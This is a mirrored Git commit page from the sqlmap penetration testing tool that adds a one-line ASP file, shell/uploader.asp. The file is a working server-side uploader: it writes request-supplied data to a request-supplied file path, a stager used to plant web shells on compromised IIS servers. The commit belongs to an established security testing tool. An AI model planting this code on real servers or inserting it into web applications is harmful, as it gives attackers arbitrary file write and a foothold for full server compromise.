mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-05-13 17:06:53 +00:00
Added an ASP uploader
This commit is contained in:
parent
e10ab5aa0e
commit
9b0f11f879
1 changed files with 1 additions and 0 deletions
1
shell/uploader.asp
Normal file
1
shell/uploader.asp
Normal file
|
|
@ -0,0 +1 @@
|
|||
<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>
|
||||
Loading…
Add table
Add a link
Reference in a new issue